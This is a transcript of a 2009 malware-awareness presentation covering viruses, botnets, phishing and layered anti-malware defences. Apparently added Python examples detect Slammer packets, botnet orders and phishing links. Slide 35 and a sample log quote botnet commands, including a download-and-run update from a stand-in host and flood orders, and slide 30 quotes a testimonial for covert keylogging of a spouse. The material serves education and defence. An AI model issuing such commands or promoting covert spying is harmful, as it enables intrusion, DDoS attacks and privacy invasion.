Malware: Just How Safe are You! - British Computer Society · 2011-10-19 · intended but the user...

ISS – X-Force Professional Security Services British Computing Society - October 22nd 2009 © 2009 IBM Corporation Malware: Just How Safe are You! Martin Overton Malware/Anti-Malware SME

Transcript of Malware: Just How Safe are You! - British Computer Society · 2011-10-19 · intended but the user...

Page 1: Malware: Just How Safe are You!
– Martin Overton
– Malware/Anti-Malware SME

Page 2: Agenda
• The Problem
  – Malware, what it is and how it works
  – Identity Theft, Bots, Extortion & Mules
• What can I do about it?
• Conclusions
• Questions

Page 3: Disclaimer
• Products named in this presentation are used as examples only, and should not be taken as any form of endorsement by IBM.
• All trademarks and copyrights are acknowledged.

Page 4: The Battlefield
• Your Computer
  – Computers are really, really complex.
  – We don't have the foggiest idea what our computers are doing.
  – So many targets, so little time.
• Your Brain
  – The weakest link in most security is the human being behind the keyboard.

Page 5: The Problem… Malware

Page 6: Definitions
• Virus: "A computer program that can infect other computer programs or [system areas] by modifying them to include a copy (possibly modified) of itself." – Dr. Frederick Cohen, Computer Virus Theory & Experiments.
• Trojan: "A Trojan Horse is a program that does something that its programmer intended but the user is not expecting." "Viruses must replicate to be classed as viruses and Trojans don't replicate."
• Worm: "A worm is a program that makes copies of itself. It may do damage and compromise the security of the computer, but it doesn't replicate by changing a host's code or files." – "Viruses infect, worms infest."
• Malware*: "Code that causes unwanted effects: such as viruses, Trojans (including Remote Access Trojans (RATs)), worms and the side-effects thereof."
* Malicious Software

Page 7: Definition: Virus
"Viruses are an 'Urban Myth', just like the alligators that live in the New York sewers." – Peter Norton, 1988

Page 8: More Definitions
• Backdoor aka RAT: "A program that is installed on a victim's PC to allow remote access and full control of the victim's PC. They are classified as a sub-class of Trojans as they are frequently installed without the knowledge of the victim."
  – Think of it as a 'remote control' for the victim's computer!
• Blended threat: "Malware which uses multiple methods (vectors) and techniques (methodologies/exploits/payloads) to propagate and attack systems and networks. (Also known as Cocktail Malware.)"
  – Examples include: CodeRed and family, Nimda, Goner, Gokar, Scalper, Slapper, Klez, Yaha, etc.

Page 9: [Chart: Known/Predicted Virus Growth – Running Total (by year: actual and predicted). Y axis: Total Number of Viruses (Thousands), 0 to 700; X axis: Year, 1986 to 2009]

Page 10: [Chart: Known/Predicted Virus Growth (Actual) (by year: actual and predicted). Y axis: Number of new Viruses, 0 to 180,000; X axis: Year, 1986 to 2008]

Page 11: The Changing Face of the Threat
• It was easy when everything was a virus…
  – File infectors
  – Boot infectors
  – Multipartite (File/Boot)
  – Macro
  – Script
• Now viruses are just one category of Malware…
  – Viruses
  – Worms
  – Trojans
  – Backdoors
  – Bots, Zombies
  – Adware
  – Spyware
  – Blended Threats
  – Applications, Security/Hacking Tools
  – Key loggers
  – Rootkits

Page 12: Why create malware?
• Old Motivations:
  – Curiosity
  – Malice or revenge
  – Peer recognition
  – Political or other causes
  – Fame or infamy
  – Boredom
  – Anarchy
• Typically written by a teenage male
• New Motivations:
  – Theft of intellectual property, personal data
  – Extortion / blackmail
  – Use stolen machines to carry out attacks, send spam, etc.
  – Make money, and lots of it…
• Typically written to order by professional programmers for professional criminals
• In other words it is now all about…

Page 13: How do they arrive or get on my PC?
• Email (links and attachments)
• Web sites (downloads, or via exploits)
• Instant Messaging (downloads, or via exploits)
• Social Engineering
• Social Networking (Twitter, Facebook, XING, LinkedIn)
• USB devices (including phones and iPods)
• Windows shares, poor passwords, exploits
• Floppy discs and infected files (almost any file type now, including PDFs!)

Page 14: What do they do on, and to my PC?
• Install themselves
• Often disable security tools in place (anti-malware & personal firewall)
• Invite other malcode in to party on your PC
• Steal data (credit card information, bank details, software keys, etc.)
• Install a backdoor to allow remote access/control
• Look for other systems to infect
• Join a botnet
• Send spam, participate in a DDoS attack, host phishing or malware files or a web site, be used to store stolen or illegal material, and so on…
• Delete files, registry keys, format the HD, corrupt files, hold files to ransom…

Page 15: Latest Stats
• 233% growth in the number of malicious sites in the last six months and a 671% growth during the last year.
• 77% of Web sites with malicious code are legitimate sites that have been compromised.
• 95% of comments to blogs, chat rooms and message boards are spam or malicious.
• 57% of data-stealing attacks are conducted over the Web.
• 85.6% of all unwanted emails in circulation contained links to spam sites and/or malicious Web sites.

Page 16: Virus Payload Animations

Page 17: Other Virus Screenshots

Page 18:

Page 19: Swen

Page 20: CodeRed Spread

Page 21: The Slammer Worm
• Exploited a well-known bug in Microsoft SQL Server 2000 / MSDE 2000 (not the Windows OS itself) for which a patch had already existed for six months.
• If a vulnerable box receives a single infected 376-byte packet (one UDP datagram to the SQL resolution service on port 1434), it becomes infected.
• Once a machine is infected, it uses all available bandwidth to fire out infected packets to random addresses.
  – 100 Mb connection = 30,000 infected packets per second
• Most vulnerable machines were infected within ten minutes.
• Slammer carried no payload.
  – Mayhem caused by the traffic levels it generated:
    • Brought down ATM machines
    • Grounded airliners
    • Caused power outages (allegedly)
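Because the whole worm was one datagram, Slammer is the textbook case for a packet-level signature: UDP to port 1434, a 376-byte payload, first byte 0x04 (the SQL Server Resolution Service request type the overflow sat in). The example below is added for this page and is not from the original deck; it builds a handful of raw IPv4/UDP packets inline (constructed, not captured; the addresses are documentation ranges) and picks out the hosts that are spraying Slammer-sized datagrams. The `packets_per_second` helper reproduces the slide's "100 Mb = 30,000 packets per second" figure from the 404-byte datagram plus a 14-byte Ethernet header.

```python
"""Flag Slammer-style datagrams in raw IPv4/UDP packets (added example).

Signature: UDP dst port 1434, 376-byte payload, first payload byte 0x04.
SAMPLE_PACKETS below are constructed here for the example, not captured.
"""
import socket
import struct

SSRP_PORT = 1434            # SQL Server Resolution Service
SLAMMER_PAYLOAD_LEN = 376   # the entire worm
SSRP_REQUEST_TYPE = 0x04    # CLNT_UCAST_INST, the request the overflow lived in


def build_udp_packet(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Minimal IPv4 header + UDP header + payload; checksums left at 0."""
    udp_len = 8 + len(payload)
    udp_hdr = struct.pack("!HHHH", sport, dport, udp_len, 0)
    total_len = 20 + udp_len
    # ver/IHL, TOS, total length, id, flags/frag, TTL, proto 17 (UDP), checksum, src, dst
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 17, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    return ip_hdr + udp_hdr + payload


def parse_udp(packet: bytes):
    """Return (src, dst, sport, dport, payload), or None if not IPv4/UDP."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 17 or len(packet) < ihl + 8:
        return None
    src = socket.inet_ntoa(packet[12:16])
    dst = socket.inet_ntoa(packet[16:20])
    sport, dport, udp_len, _ = struct.unpack("!HHHH", packet[ihl:ihl + 8])
    payload = packet[ihl + 8:ihl + udp_len]
    return src, dst, sport, dport, payload


def is_slammer_like(packet: bytes) -> bool:
    parsed = parse_udp(packet)
    if parsed is None:
        return False
    _, _, _, dport, payload = parsed
    return (dport == SSRP_PORT
            and len(payload) == SLAMMER_PAYLOAD_LEN
            and payload[0] == SSRP_REQUEST_TYPE)


def find_infected_sources(packets) -> list:
    """Unique source addresses sending Slammer-like datagrams, in order first seen."""
    seen = []
    for pkt in packets:
        if is_slammer_like(pkt):
            src = parse_udp(pkt)[0]
            if src not in seen:
                seen.append(src)
    return seen


def packets_per_second(link_bps: int, frame_bytes: int = 20 + 8 + 376 + 14) -> int:
    """Slammer frames needed to saturate a link (IP + UDP + payload + Ethernet header)."""
    return link_bps // (frame_bytes * 8)


# Constructed sample traffic (documentation address ranges, not a capture):
SAMPLE_PACKETS = [
    # legitimate SSRP "list instances" broadcast: 1-byte payload 0x02
    build_udp_packet("10.0.0.5", "10.0.0.20", 50000, 1434, b"\x02"),
    # Slammer-like: 0x04 followed by 375 filler bytes, sprayed at a random target
    build_udp_packet("10.0.0.7", "192.0.2.99", 1041, 1434, b"\x04" + b"\x01" * 375),
    # DNS query: wrong port, ignored
    build_udp_packet("10.0.0.5", "10.0.0.53", 40000, 53, b"\x00" * 30),
    # same infected host, second random target
    build_udp_packet("10.0.0.7", "203.0.113.4", 1041, 1434, b"\x04" + b"\x01" * 375),
]

if __name__ == "__main__":
    print("infected sources:", find_infected_sources(SAMPLE_PACKETS))
    print("100 Mbit/s link carries about", packets_per_second(100_000_000), "Slammer frames/s")
```

The point of checking payload length and the first byte, not just the port, is that legitimate SSRP probes also go to UDP/1434; a port-only rule would have flagged every SQL client on the network.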

Page 22: Slammer Spread

Page 23: Converged Threat – Conficker (aka Downadup)

Page 24: Linux Viruses
• Fastest growing operating system
  – Linux OS gaining popularity
  – Increased Linux deployment
• Linux virus growth increase
  – 50 known viruses in 2001
  – Over 5,000 current known viruses (source: Trend Micro)
• Protection more complex than WinXX
  – OS kernel level consistency (RTS)
  – AV vendor reluctance to support multiple and easily modified kernels

Page 25: OSX/Leap-A aka OSX/Oompa-A
• Infects the Mac OS X operating system.
• The worm makes use of the Spotlight search program, included in OS X, and will run each time the machine boots.
• Uses iChat to send the infected file – latestpics.tgz – to all contacts on the infected user's buddy list.

Page 26: Instant Messaging & Internet Relay Chat
• Many malware now include IM as an infection vector.
• Most use port 80, which makes it next to impossible to restrict unauthorised outbound traffic by port alone.
• Many bots now spread via IM.
• Bypasses gateway AV.
• Vulnerable to hackers.
• Weak (or no) encryption.
• Mainly rely on social engineering.

Page 27: Mobile/Cabir
• This proof-of-concept worm spreads through Bluetooth-enabled devices.
• When it arrives, a series of messages appear. These messages warn the user of the possible malicious nature of the file before it is finally installed.
This worm has its Product ID set to (0x101F6F88), which basically targets Series 60 v0.9. The said setting is the most common and conservative choice for a basic application because it is compatible with all existing Series 60 devices.
Mabir – Cabir with MMS functionality too…
Some Series 60 devices are as follows:
Phones based on Nokia Series 60 Developer Platform 2.0 (Nokia 7610, Nokia 6620, Nokia 6600, Panasonic X700)
Phones based on Nokia Series 60 Developer Platform 1.0 (Nokia 7650, Nokia 3650, 3600, Nokia 3660, 3620, Nokia N-Gage, Siemens SX1, Sendo X)

Page 28: Duts aka Dust
• This proof-of-concept virus is a parasitic file infector. It is the first known virus for the PocketPC platform. Duts affects ARM-based devices only, and targets Windows CE / PocketPC devices.
• Duts contains two messages that are not displayed:
"This is proof of concept code. Also, i wanted to make avers happy. The situation when Pocket PC antiviruses detect only EICAR file had to end ..."
• The other one is a reference to the science-fiction book Permutation City by Greg Egan, where the virus got its intended name from: "This code arose from the dust of Permutation City"

Page 29: More Definitions
• Spyware: the generic name for any application that may track your online and/or offline PC activity and is capable of locally saving or transmitting those findings to third parties, sometimes with, but more often without, your knowledge or consent.
  – Spyware comes in many forms including adware, key loggers, Trojans, browser hijackers, and diallers.
• Keylogger: a type of system monitor that has the ability to record all keystrokes on your computer. Therefore, a keylogger can record and log your e-mail conversations, chat room conversations, instant messages, and any other typed material. They have the ability to run in the background, hiding their presence.

Page 30: Spyware - Key Logger - Example
What a great program!
This was just an outstanding program. I've had no problems with it running, and had no problems installing it. This program ran in the background under stealth mode and let me catch my cheating husband in the act of sending emails and instant messages to his mistress. He never even suspected the program was on the computer.
I highly recommend this program if, like me, you are looking to catch a two-timing rat. We are now divorced, and needless to say, the program has paid for itself many, many times over.

Page 31: Malware extortion

Page 32: Definitions
• Bot: 'Bot' is a contracted (truncated or short) name for a software robot. A bot is a piece of software that allows a system to be remotely controlled without the owner's knowledge; it can also be used to automate common tasks, for example on IRC. Also known as a drone or zombie.
• Botnet: A group ['Herd' or 'Network'] of zombie systems controlled by the 'Bot Herder'. These botnets are told what to do by the botnet owner. This can be anything that the bot has been programmed to do, including updating itself or installing new malicious software.
• Bot Herder: The person [or group] which "owns" and controls a herd of bots. Also known as the Bot Master aka Zombie Master.

Page 33: Definitions
• DDoS [aka Distributed Denial of Service]
  – A distributed denial-of-service attack is an attack on a computer system or network from multiple co-ordinated systems (typically the members of a botnet) which together perform a denial of service attack against the target.
• IRC – "Internet Relay Chat (IRC) is a form of instant communication over the Internet. It is mainly designed for group (many-to-many) communication in discussion forums called channels, but also allows one-to-one communication."

Page 34: Infection/Propagation Methods
• Vulnerabilities, e.g. RPC, DCOM, LSASS, MSSQL
• Dictionary attack, open Windows shares [SMB]
• E-mail: Mytob, Bagle, Mitglieder, etc.
• Existing backdoor: Bagle, Mydoom, etc.
• Download from website via dropper [e-mail or Instant Messaging]
• Peer 2 Peer file sharing
Update Methods
• Update or install new components from website or ftp server

Page 35: [Diagram: Bot Herder, IRC Server, DNS Server, infected bots]
Report for Duty: Once infected, the bot signs in to the IRC server's dedicated 'bot' channel for instructions.
Example 'botnet' commands:
• Scan for more victims to press-gang into service: Advscan lsass 200 5 0 -b
• Update the 'bot' software: http.update http://badserver/bot.exe c:\msupdate.exe 1
• Attack!: Ddos.syn xxx.xxx.xxx.xxx 80 900 and Udp xxx.xxx.xxx.xxx 20000 100000 10
• Spam, Spam, Spam…: Spam.setlist, Spam.settemplate, Spam.start
Send Orders: All bots connected to the IRC server's dedicated 'bot' channel receive and carry out the instructions.
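The orders on this slide are plain channel messages, so anything that logs IRC (a proxy, an IDS with an IRC preprocessor, the server itself) can be mined for them. The example below is added for this page and is not from the original deck: it runs a few constructed log lines (the `#b0ts` channel, the nick `h3rd3r`, the hosts and the log line layout are all made up for the example) through patterns modelled on the command syntax shown on the slide and reports who is issuing bot orders, in which channel, and of what kind.

```python
"""Spot botnet orders in IRC logs (added example, constructed input).

The command grammar follows the slide's examples (advscan, http.update,
ddos.syn, udp, spam.*); bots of that family usually prefix orders with
'.' or '!', which is stripped before matching.
"""
import re
from collections import Counter

# order pattern -> what the bot is being told to do
BOT_COMMANDS = {
    r"advscan\s+\w+\s+\d+\s+\d+\s+\d+": "scan/exploit for new victims",
    r"http\.update\s+https?://\S+\s+\S+\s+\d": "update/replace bot binary",
    r"ddos\.\w+\s+[\d.]+\s+\d+\s+\d+": "launch DDoS flood",
    r"udp\s+[\d.]+\s+\d+\s+\d+\s+\d+": "launch UDP flood",
    r"spam\.(setlist|settemplate|start)": "spam run",
}

# Assumed log layout: "<time> <nick>!<user>@<host> PRIVMSG <target> :<text>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<nick>[^!\s]+)!\S+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$")


def classify_line(line: str):
    """Return (channel, nick, role, text) if the line carries a bot order, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    text = m.group("text").strip().lstrip(".!")
    for pattern, role in BOT_COMMANDS.items():
        if re.match(pattern, text, re.IGNORECASE):
            return m.group("target"), m.group("nick"), role, text
    return None


def herder_report(lines) -> dict:
    """Aggregate orders per (channel, nick): who gives orders and of what kind."""
    report = {}
    for line in lines:
        hit = classify_line(line)
        if hit:
            channel, nick, role, _ = hit
            report.setdefault((channel, nick), Counter())[role] += 1
    return report


# Constructed sample log (not a real capture); the target IP is a documentation address.
SAMPLE_LOG = [
    "12:00:01 alice!a@host1 PRIVMSG #general :anyone seen the patch notes?",
    "12:00:05 h3rd3r!x@badhost PRIVMSG #b0ts :.advscan lsass 200 5 0 -b",
    "12:00:09 h3rd3r!x@badhost PRIVMSG #b0ts :.http.update http://badserver/bot.exe c:\\msupdate.exe 1",
    "12:01:10 h3rd3r!x@badhost PRIVMSG #b0ts :.ddos.syn 198.51.100.7 80 900",
    "12:01:11 h3rd3r!x@badhost PRIVMSG #b0ts :.udp 198.51.100.7 20000 100000 10",
    "12:02:00 h3rd3r!x@badhost PRIVMSG #b0ts :.spam.setlist",
    "12:02:01 h3rd3r!x@badhost PRIVMSG #b0ts :.spam.start",
    "12:03:00 bob!b@host2 PRIVMSG #general :the udp checksum field is optional in IPv4",
    "12:03:05 :irc.example NOTICE * :*** Looking up your hostname",
]

if __name__ == "__main__":
    for (channel, nick), roles in herder_report(SAMPLE_LOG).items():
        print(f"{nick} in {channel}: {dict(roles)}")
```

Anchoring each pattern at the start of the message (`re.match`) and requiring the numeric arguments keeps ordinary chat that merely mentions "udp" or "scan" from firing; in practice you would also key on the channel name and on many distinct hosts joining it, which is the view the Honeynet Project used to count botnets.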

Page 36: [Diagram: Bot Herder → Botnet → Scan and 'Sploit Victim / DDoS Victim / Spam, 419, or Phishing Victim / Malware or Dropper; with DNS Server and IRC Server]

Page 37: Size of the Problem
• The Honeynet Project paper entitled "Know your Enemy: Tracking Botnets":
  – Logged 226,585 unique IP addresses logging into one of the IRC botnet C&C channels.
  – Botnets ranged in size from several hundred 'zombies' to more than 50,000 'zombies'.
  – They observed 226 DDoS attacks against 99 unique targets.
  – Typical size of a botnet: 2000+ bots ['zombies'].
  – From this data they worked out that the number of bots required to successfully DDoS a typical company was just 13. This assumes that the company is on a T1 [1.544Mbit] and that each 'zombie' has a 128Kbit link [128Kbit x 13 = 1.664Mbit].

Page 38: Definition: Phishing
• The art of using social engineering to encourage the user to divulge information.
• The user receives an email directing them to a website which looks official, but isn't!
• The user is encouraged to enter account details, passwords etc.
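"Looks official, but isn't" usually comes down to a few URL tricks: the brand name placed in a subdomain or path of some other domain, a bare IP address as the host, or `user@host` syntax that shows the brand before the `@` and sends the browser somewhere else. The example below is added for this page and is not from the original deck; it triages a list of constructed URLs (the brand list and the addresses are made up, using documentation ranges) for those tells. The "registrable domain = last two labels" rule is a deliberate simplification for the example; production code should use the Public Suffix List so that `bank.co.uk` is handled correctly.

```python
"""Triage links in a suspected phishing mail (added example, constructed input)."""
import ipaddress
from urllib.parse import urlsplit

# Brands whose customers we protect; hypothetical list for the example.
BRANDS = {"examplebank.com", "paypal.com"}


def registrable_domain(host: str) -> str:
    """Last two DNS labels (simplification; use the Public Suffix List in production)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def phishing_indicators(url: str) -> list:
    """Reasons a URL looks like a lookalike; empty list when nothing is suspicious."""
    reasons = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.username is not None:
        reasons.append("userinfo before host")      # http://brand@evil/ trick
    try:
        ipaddress.ip_address(host)
        reasons.append("IP address instead of hostname")
    except ValueError:
        pass
    domain = registrable_domain(host)
    if domain in BRANDS:
        return reasons                               # genuinely the brand's own host
    for brand in BRANDS:
        name = brand.split(".")[0]
        if name in host:
            reasons.append(f"brand '{name}' in host but domain is {domain}")
        elif name in parts.path.lower():
            reasons.append(f"brand '{name}' only in path of {domain}")
    if parts.scheme == "http" and reasons:
        reasons.append("plain http")
    return reasons


def triage(urls) -> dict:
    return {u: phishing_indicators(u) for u in urls}


# Constructed sample links (not from any real mail):
SAMPLE_URLS = [
    "https://online.examplebank.com/login",
    "http://examplebank.com.secure-verify.example/login",
    "http://198.51.100.23/examplebank/update.php",
    "http://www.paypal.com@203.0.113.9/cgi-bin/webscr",
    "https://news.example.org/article",
]

if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_URLS).items():
        print(("SUSPECT " if reasons else "ok      ") + url, reasons)
```

The check deliberately stops at the registrable domain: a host such as `online.examplebank.com` is the bank's whether or not the rest of the URL looks odd, and it is the registrable domain, not what appears first in the address bar, that the user should be trained to read.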

Page 39:

Page 40: The Darker Side Of Phishing
• Recently phishing scams have moved on from simply stealing your bank details to installing malware on your PC!

Page 41: Mules
• Why store things on my computer, when I can store them on yours?
  – Broadband makes this feasible
  – Easy to do with a Trojan

Page 42: Identity and IP Theft
• Identity is easy to steal
  – Given access to a machine
  – All your life is there!
  – Very hard to recover from
• Theft of corporate data [Intellectual Property]
  – Sold to your competitors
  – Beat you to the sale
  – Copy/Steal your product designs, etc.
• Tools – Trojan, spyware, key logger, bot

Page 43: Attack Sophistication Increases While Intruder Sophistication Decreases
• Meta-Events help identify multi-event tool based attacks
[Chart: Attack Sophistication rising from LOW to HIGH while Intruder Sophistication falls from HIGH to LOW]

Page 44: Threat Convergence Replacing Threat Evolution
• Threat Evolution:
  – A flat world has brought about an unprecedented number of criminals and cons
  – Attackers keep ROI in mind as well, and constantly evolve their wares in order to re-purpose them for the next flood of attacks
  – High profile vulnerabilities will still be the vehicles for new attacks; however, the low and slow attack vectors cannot be ignored
  – The economics of exploitation must be taken into consideration to better prioritise risk

Page 45: What can I do about it?

Page 46: Anti-Malware Strategy
• Malware/Spyware/Rootkit scanners are ONLY as good as their LAST UPDATE.
• No 100% solution
  – "Anyone who tells you that their product offers 100% protection from viruses is either naïve or just doesn't fully understand the real problem."
• Best you can expect is 98%, but only if you design and implement your approach properly.
• Implement a multi-layered defence!

Page 47: Multi-layered Anti-Malware, What's That?
• Like an Onion
  – E-Mail was responsible for at least 80% of all malware outbreaks.
  – Web filtering/scanning can block many attacks.
  – Updating a few perimeter machines can stop new malware from gaining a beach head.
[Onion diagram, layers: Personal Computers; Firewall/Proxy Server; Web Scanning/Mail Scanning; File/Print Servers]

Page 48: Solutions – Tools and Technologies
• Anti-Virus
  – Too many to list
• Anti-Rootkit Tools
  – ChkRootkit [*NIX - http://chkrootkit.org/]
  – Rootkit Hunter [*NIX - http://www.rootkit.nl/projects/rootkit_hunter.html]
  – RootkitRevealer [Wintel - http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml]
  – UnHackMe [Wintel - http://greatis.com/unhackme/]
  – Blacklight [Wintel - http://www.f-secure.com/blacklight/]
• Personal Firewalls
  – Too many to list
  – Can block internet access to untrusted executables – assuming the malware hasn't already disabled it!

Page 49: Solutions – Tools and Technologies - Other

• Honeypots and Honeynets
• IDS and IPS
• Perimeter firewalls
• Partitioning your network with router ACLs and internal firewalls
• Patch management
• Strong passwords

“In other words, stop them getting onto your systems in the first place, and if they do get in, slow them down, or increase your ability for early detection.”

Page 50: Applying a Multi-layered Anti-Malware

[Diagram: the onion layers from slide 47 – Firewall/Proxy Server; Web Scanning/Mail Scanning; File/Print Servers; Personal Computers – annotated with the controls placed at each layer:]

AV Vendor 1
IDS
AV Vendor 2
Content Filtering/Generic Blocking/Filtering
Kernel Wrappers (Entercept)
Intrusion Prevention Systems (IntruShield)
AV Vendor 3
Personal Firewalls
Personal IDS
Behaviour Blockers/Sandbox
Integrity Management
PacketShapers (QoS/Packeteer)
NetFlow (Cisco)
Layer 7 Switches
Centralised remote patching of all systems
Backups
SMB-Lures, Tarpits, Honeypots, Honeynets, BillyGoats
Policies and Procedures
Managed Service
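The “Integrity Management” control on this slide is easiest to understand with a concrete check. The following is an added example, not code from the presentation or from any product named on it: a minimal file-integrity monitor that records a SHA-256 baseline for a directory tree and later reports files that were modified, added or removed. The directory tree, file names and contents are constructed for the demonstration.

```python
"""Added example (not from the presentation): a minimal file-integrity
monitor of the kind the "Integrity Management" layer refers to. A baseline
of SHA-256 hashes is taken for a directory tree; a later run reports files
that were modified, added or removed. The tree and file contents below are
constructed for the demonstration."""
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk_size: int = 65536) -> str:
    """SHA-256 of a file, read in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare_baseline(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Report differences between the tree as it is now and the stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> tuple[dict[str, list[str]], dict[str, list[str]]]:
    """Constructed scenario: baseline a small tree, check it unchanged, then
    tamper with it (one file altered, one added, one deleted) and re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "etc").mkdir()
        (root / "bin" / "ls").write_bytes(b"original ls binary")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")

        # The baseline would normally live on read-only or off-box storage so a
        # compromised host cannot rewrite it; here it is round-tripped through
        # JSON only to show it survives serialisation.
        stored = json.loads(json.dumps(build_baseline(root)))
        clean_report = compare_baseline(root, stored)

        (root / "bin" / "ls").write_bytes(b"original ls binary with extra bytes")  # modified
        (root / "bin" / "unexpected").write_bytes(b"not in the baseline")          # added
        (root / "etc" / "hosts").unlink()                                           # removed
        tampered_report = compare_baseline(root, stored)
    return clean_report, tampered_report


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean tree:", clean)
    print("after tampering:", tampered)
```

The check only tells you that something changed, not what changed it, which is why the slide pairs it with backups and with policies and procedures: a baseline is only useful if it was taken on a known-good system and stored where the malware cannot rewrite it alongside the files it alters.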

Page 51: Putting it all together…

Malware Sensors
  SMB-Lures, Tarpits, Honeypots, Honeynets, BillyGoats

Multiple Antivirus Vendors
  Workstation
  Servers
  Perimeter (Web, FTP and SMTP)

IDS
  Using custom malware rules/signatures

Automated Patching
  Centralised remote patching of all systems via Tivoli, SMS, etc.

Management
  Centralised, Geo-centric, or at least country-centric
  Policies (What we want to achieve)
  Procedures (How we are going to achieve it)
  People (Who’s going to do it)
  Products (The technology bit)

Others
  Kernel Wrappers (Entercept)
  Personal Firewalls (McAfee/ZoneLabs)
  Personal IDS (Blackice)
  Generic Blocking/Filtering
  Heuristics
  Backups
  Intrusion Prevention Systems (IntruShield)
  Behaviour Blockers/SandBox Technology (FinJan SurfinShield)
  Firewalls/Proxies
  PacketShapers (QoS/Packeteer)
  NetFlow (Cisco)
  Layer 7 Switches
  Managed e-mail virus scanning, anti-spam service
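Two points from these slides, the IDS layer “using custom malware rules/signatures” here and the warning on slide 46 that scanners are “ONLY as good as their LAST UPDATE”, can be seen together in one small piece of code. What follows is an added example and is not code from the presentation or from any IDS or anti-virus product it names: a toy signature scanner where each rule is a set of byte patterns that must all be present, plus a freshness check on the rule set. The rule names, rule-set versions, patterns and sample files are all constructed for the demonstration and correspond to no real malware family.

```python
"""Added example (not from the presentation): a toy signature scanner in the
spirit of custom malware rules/signatures on the IDS layer, used to show why
a scanner is only as good as its last update. Every rule, rule-set version
and sample below is constructed for the demonstration and does not
correspond to any real malware family or product."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class Rule:
    name: str
    all_of: tuple[bytes, ...]  # a sample matches when every pattern is present


@dataclass(frozen=True)
class RuleSet:
    version: str
    updated: date
    rules: tuple[Rule, ...]

    def age_days(self, today: date) -> int:
        """Days since this rule set was published."""
        return (today - self.updated).days


def scan(sample: bytes, ruleset: RuleSet) -> list[str]:
    """Names of rules whose patterns all occur in the sample (plain substring match)."""
    return [r.name for r in ruleset.rules if all(p in sample for p in r.all_of)]


def scan_all(samples: dict[str, bytes], ruleset: RuleSet) -> dict[str, list[str]]:
    """Scan a set of named samples and return the detections per sample."""
    return {name: scan(data, ruleset) for name, data in samples.items()}


def is_stale(ruleset: RuleSet, today: date, max_age_days: int = 7) -> bool:
    """True when the rule set is older than the update interval you are prepared to run with."""
    return ruleset.age_days(today) > max_age_days


TALK_DATE = date(2009, 10, 22)  # date of the talk, used as "now" in the demo

# Constructed rule sets: RULES_V2 is RULES_V1 plus one rule added three weeks later.
RULES_V1 = RuleSet(
    version="2009-10-01",
    updated=date(2009, 10, 1),
    rules=(
        Rule("Demo.Dropper.A", (b"DEMO_DROPPER_MARKER", b"autorun.inf")),
        Rule("Demo.Bot.B", (b"DEMO_BOT_MARKER", b"irc.example.invalid")),
    ),
)
RULES_V2 = RuleSet(
    version="2009-10-22",
    updated=date(2009, 10, 22),
    rules=RULES_V1.rules + (Rule("Demo.Worm.C", (b"DEMO_WORM_MARKER", b"spread.cfg")),),
)

# Constructed samples: two carry a demo marker, one is a harmless document.
SAMPLES = {
    "invoice.exe": b"MZ\x90\x00 ... DEMO_DROPPER_MARKER ... autorun.inf ...",
    "report.doc": b"Quarterly figures, nothing of interest to a scanner.",
    "update.exe": b"MZ\x90\x00 ... DEMO_WORM_MARKER ... spread.cfg ...",
}


if __name__ == "__main__":
    for rs in (RULES_V1, RULES_V2):
        print(f"rule set {rs.version} (stale: {is_stale(rs, TALK_DATE)}):",
              scan_all(SAMPLES, rs))
```

Run on the talk date, the three-week-old rule set still catches the dropper but reports nothing for the sample that only the newer rule describes, which is the slide 46 point in miniature; the staleness check is the kind of thing to alarm on centrally rather than leave to each user, and it is also why the deck recommends multiple vendors and heuristics rather than one signature set.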

Page 52: The Best Defence – End User

• Regularly run a malware scan
  – Keep your anti-malware product up-to-date
• Install firewall code, anti-spyware and anti-rootkit tools
• Don’t run Peer to Peer software
• Keep up to date with security patches
• Learn a bit more about your computer
  – Never, ever run anything you’ve downloaded or received unless you’re pretty confident of its source
  – Download some tools
  – Think!

Page 53: Conclusions…

• Malware is here to stay.
• The problem is going to get worse.
  • 4-7000+ new malware every month. January 2008 was over 13,000!
  • More Worms, Bots, Trojans and ‘Blended Threats’ appearing.
  • Becoming more stealthy and rely more on Social-engineering.
  • For profit, no longer for fun…
• More than 600,000 viruses by the end of 2009?
• No matter what tricks the malware writers use the AV industry will neutralise it.
  – Eventually!
• AV is only one small but important part of an overall anti-malware solution.
• Technology is a small part of an overall solution, user behaviour and proper security controls must be addressed.

Page 54: Not all computer problems are caused by malware…

Page 55: Questions?

Page 56: Contact details…..

Martin Overton
EMEA Malware/Anti-Malware SME
IBM ISS X-Force – PSS

• E-Mail: overtonm@uk.ibm.com
• Telephone: +44 (0)2392563442
• Mobile: +44 (0)7764666939

Page 57: Useful sites

• Anti-Virus (On-line scanners)
  • http://housecall.trendmicro.com/
  • http://us.mcafee.com/root/mfs/default.asp
• Links to FREE AV, Personal Firewalls and Anti-Spyware tools
  • http://momusings.co.uk/software.aspx
